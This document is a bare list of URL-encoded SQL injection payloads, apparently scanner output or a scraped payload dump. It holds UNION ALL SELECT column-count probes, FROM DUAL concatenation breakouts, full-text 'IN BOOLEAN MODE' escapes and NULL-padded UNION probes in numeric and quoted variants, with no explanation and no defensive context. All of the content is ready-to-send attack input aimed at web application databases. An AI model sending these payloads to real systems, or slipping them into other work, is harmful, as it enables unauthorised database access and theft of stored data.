-2647%20WHERE%204879%3D4879%20UNION%20ALL%20SELECT%204879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879%2C4879--%20 -4928%20WHERE%205619%3D5619%20UNION%20ALL%20SELECT%205619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619%2C5619--%20 -4582%20WHERE%208365%3D8365%20UNION%20ALL%20SELECT%208365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365--%20 -4909%27%7C%7C%28SELECT%20%27htzi%27%20FROM%20DUAL%20WHERE%202701%3D2701%20UNION%20ALL%20SELECT%202701%2C2701%2C2701%2C2701%2C2701%2C2701%2C2701%2C2701%2C2701%2C2701%2C2701%2C2701%2C2701%2C2701%2C2701%2C2701%2C2701%2C2701%2C2701%2C2701%2C2701--%20 -6089%27%7C%7C%28SELECT%20%27oDiW%27%20FROM%20DUAL%20WHERE%209129%3D9129%20UNION%20ALL%20SELECT%209129%2C9129%2C9129%2C9129%2C9129%2C9129%2C9129%2C9129%2C9129%2C9129%2C9129%2C9129%2C9129%2C9129%2C9129%2C9129%2C9129%2C9129%2C9129%2C9129%2C9129%2C9129--%20 -6607%27%7C%7C%28SELECT%20%27GxDA%27%20FROM%20DUAL%20WHERE%207456%3D7456%20UNION%20ALL%20SELECT%207456%2C7456%2C7456%2C7456%2C7456%2C7456%2C7456%2C7456%2C7456%2C7456%2C7456%2C7456%2C7456%2C7456%2C7456%2C7456%2C7456%2C7456%2C7456%2C7456%2C7456%2C7456%2C7456--%20 -3913%27%7C%7C%28SELECT%20%27xnmn%27%20FROM%20DUAL%20WHERE%204874%3D4874%20UNION%20ALL%20SELECT%204874%2C4874%2C4874%2C4874%2C4874%2C4874%2C4874%2C4874%2C4874%2C4874%2C4874%2C4874%2C4874%2C4874%2C4874%2C4874%2C4874%2C4874%2C4874%2C4874%2C4874%2C4874%2C4874%2C4874--%20 -5699%27%7C%7C%28SELECT%20%27WjWE%27%20FROM%20DUAL%20WHERE%207339%3D7339%20UNION%20ALL%20SELECT%207339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339--%20 -4995%27%7C%7C%28SELECT%20%27egYS%27%20FROM%20DUAL%20WHERE%209766%3D9766%20UNION%20ALL%20SELECT%209766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766--%20 -3951%27%7C%7C%28SELECT%20%27dMky%27%20FROM%20DUAL%20WHERE%206618%3D6618%20UNION%20ALL%20SELECT%206618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618--%20 -8385%27%7C%7C%28SELECT%20%27vmnW%27%20FROM%20DUAL%20WHERE%202897%3D2897%20UNION%20ALL%20SELECT%202897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897%2C2897--%20 -6134%27%7C%7C%28SELECT%20%27CgMz%27%20FROM%20DUAL%20WHERE%204361%3D4361%20UNION%20ALL%20SELECT%204361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361%2C4361--%20 -3316%27%7C%7C%28SELECT%20%27OkIQ%27%20FROM%20DUAL%20WHERE%202714%3D2714%20UNION%20ALL%20SELECT%202714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714%2C2714--%20 -5303%27%7C%7C%28SELECT%20%27noYQ%27%20WHERE%206505%3D6505%20UNION%20ALL%20SELECT%206505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505%2C6505--%20 -8671%27%7C%7C%28SELECT%20%27LLOi%27%20WHERE%208199%3D8199%20UNION%20ALL%20SELECT%208199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199%2C8199--%20 -7524%27%7C%7C%28SELECT%20%27UiXH%27%20WHERE%209510%3D9510%20UNION%20ALL%20SELECT%209510%2C9510%2C9510%2C9510%2C9510%2C9510%2C9510%2C9510%2C9510%2C9510%2C9510%2C9510%2C9510%2C9510%2C9510%2C9510%2C9510%2C9510%2C9510%2C9510%2C9510%2C9510%2C9510--%20 -4926%27%7C%7C%28SELECT%20%27ZhJH%27%20WHERE%208567%3D8567%20UNION%20ALL%20SELECT%208567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567--%20 -5613%27%7C%7C%28SELECT%20%27iyBT%27%20WHERE%205878%3D5878%20UNION%20ALL%20SELECT%205878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878--%20 -9824%27%7C%7C%28SELECT%20%27qNLh%27%20WHERE%207732%3D7732%20UNION%20ALL%20SELECT%207732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732%2C7732--%20 -9070%27%7C%7C%28SELECT%20%27oadw%27%20WHERE%203251%3D3251%20UNION%20ALL%20SELECT%203251%2C3251%2C3251%2C3251%2C3251%2C3251%2C3251%2C3251%2C3251%2C3251%2C3251%2C3251%2C3251%2C3251%2C3251%2C3251%2C3251%2C3251%2C3251%2C3251%2C3251%2C3251%2C3251%2C3251%2C3251%2C3251%2C3251--%20 -1979%27%7C%7C%28SELECT%20%27rqFq%27%20WHERE%203094%3D3094%20UNION%20ALL%20SELECT%203094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094--%20 -2170%27%7C%7C%28SELECT%20%27jigh%27%20WHERE%208151%3D8151%20UNION%20ALL%20SELECT%208151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151--%20 -4636%27%7C%7C%28SELECT%20%27TCGJ%27%20WHERE%209306%3D9306%20UNION%20ALL%20SELECT%209306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306--%20 -6060%27%2B%28SELECT%20TATO%20WHERE%206762%3D6762%20UNION%20ALL%20SELECT%206762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762--%20 -5958%27%2B%28SELECT%20mZTt%20WHERE%207436%3D7436%20UNION%20ALL%20SELECT%207436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436%2C7436--%20 -9544%27%2B%28SELECT%20bcVq%20WHERE%208244%3D8244%20UNION%20ALL%20SELECT%208244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244--%20 -5918%27%2B%28SELECT%20cEzz%20WHERE%202008%3D2008%20UNION%20ALL%20SELECT%202008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008--%20 -4576%27%2B%28SELECT%20NUBY%20WHERE%207860%3D7860%20UNION%20ALL%20SELECT%207860%2C7860%2C7860%2C7860%2C7860%2C7860%2C7860%2C7860%2C7860%2C7860%2C7860%2C7860%2C7860%2C7860%2C7860%2C7860%2C7860%2C7860%2C7860%2C7860%2C7860%2C7860%2C7860%2C7860%2C7860--%20 -8642%27%2B%28SELECT%20VcdM%20WHERE%209862%3D9862%20UNION%20ALL%20SELECT%209862%2C9862%2C9862%2C9862%2C9862%2C9862%2C9862%2C9862%2C9862%2C9862%2C9862%2C9862%2C9862%2C9862%2C9862%2C9862%2C9862%2C9862%2C9862%2C9862%2C9862%2C9862%2C9862%2C9862%2C9862%2C9862--%20 -1943%27%2B%28SELECT%20bzqX%20WHERE%204469%3D4469%20UNION%20ALL%20SELECT%204469%2C4469%2C4469%2C4469%2C4469%2C4469%2C4469%2C4469%2C4469%2C4469%2C4469%2C4469%2C4469%2C4469%2C4469%2C4469%2C4469%2C4469%2C4469%2C4469%2C4469%2C4469%2C4469%2C4469%2C4469%2C4469%2C4469--%20 -3541%27%2B%28SELECT%20mwbX%20WHERE%208782%3D8782%20UNION%20ALL%20SELECT%208782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782%2C8782--%20 -4097%27%2B%28SELECT%20oDzB%20WHERE%208379%3D8379%20UNION%20ALL%20SELECT%208379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379%2C8379--%20 -9950%27%2B%28SELECT%20QfOP%20WHERE%203239%3D3239%20UNION%20ALL%20SELECT%203239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239%2C3239--%20 -1932%27%2B%28SELECT%20%27Xgra%27%20WHERE%201203%3D1203%20UNION%20ALL%20SELECT%201203%2C1203%2C1203%2C1203%2C1203%2C1203%2C1203%2C1203%2C1203%2C1203%2C1203%2C1203%2C1203%2C1203%2C1203%2C1203%2C1203%2C1203%2C1203%2C1203%2C1203--%20 -8647%27%2B%28SELECT%20%27CVSq%27%20WHERE%209269%3D9269%20UNION%20ALL%20SELECT%209269%2C9269%2C9269%2C9269%2C9269%2C9269%2C9269%2C9269%2C9269%2C9269%2C9269%2C9269%2C9269%2C9269%2C9269%2C9269%2C9269%2C9269%2C9269%2C9269%2C9269%2C9269--%20 -4612%27%2B%28SELECT%20%27rTpn%27%20WHERE%206653%3D6653%20UNION%20ALL%20SELECT%206653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653%2C6653--%20 -1082%27%2B%28SELECT%20%27DvZI%27%20WHERE%205453%3D5453%20UNION%20ALL%20SELECT%205453%2C5453%2C5453%2C5453%2C5453%2C5453%2C5453%2C5453%2C5453%2C5453%2C5453%2C5453%2C5453%2C5453%2C5453%2C5453%2C5453%2C5453%2C5453%2C5453%2C5453%2C5453%2C5453%2C5453--%20 -3895%27%2B%28SELECT%20%27vLqb%27%20WHERE%203579%3D3579%20UNION%20ALL%20SELECT%203579%2C3579%2C3579%2C3579%2C3579%2C3579%2C3579%2C3579%2C3579%2C3579%2C3579%2C3579%2C3579%2C3579%2C3579%2C3579%2C3579%2C3579%2C3579%2C3579%2C3579%2C3579%2C3579%2C3579%2C3579--%20 -6782%27%2B%28SELECT%20%27AZRK%27%20WHERE%207016%3D7016%20UNION%20ALL%20SELECT%207016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016%2C7016--%20 -6967%27%2B%28SELECT%20%27xCLW%27%20WHERE%204335%3D4335%20UNION%20ALL%20SELECT%204335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335--%20 -7333%27%2B%28SELECT%20%27cUUF%27%20WHERE%207131%3D7131%20UNION%20ALL%20SELECT%207131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131%2C7131--%20 -3815%27%2B%28SELECT%20%27ywVO%27%20WHERE%201435%3D1435%20UNION%20ALL%20SELECT%201435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435%2C1435--%20 -2899%27%2B%28SELECT%20%27DjUJ%27%20WHERE%209165%3D9165%20UNION%20ALL%20SELECT%209165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165--%20 -5357%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225--%20 -1587%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205371%2C5371%2C5371%2C5371%2C5371%2C5371%2C5371%2C5371%2C5371%2C5371%2C5371%2C5371%2C5371%2C5371%2C5371%2C5371%2C5371%2C5371%2C5371%2C5371%2C5371%2C5371--%20 -4375%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305--%20 -9281%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709--%20 -8314%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207069%2C7069%2C7069%2C7069%2C7069%2C7069%2C7069%2C7069%2C7069%2C7069%2C7069%2C7069%2C7069%2C7069%2C7069%2C7069%2C7069%2C7069%2C7069%2C7069%2C7069%2C7069%2C7069%2C7069%2C7069--%20 -2884%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207568%2C7568%2C7568%2C7568%2C7568%2C7568%2C7568%2C7568%2C7568%2C7568%2C7568%2C7568%2C7568%2C7568%2C7568%2C7568%2C7568%2C7568%2C7568%2C7568%2C7568%2C7568%2C7568%2C7568%2C7568%2C7568--%20 -4349%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554--%20 -1146%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233--%20 -8949%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823--%20 -1629%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 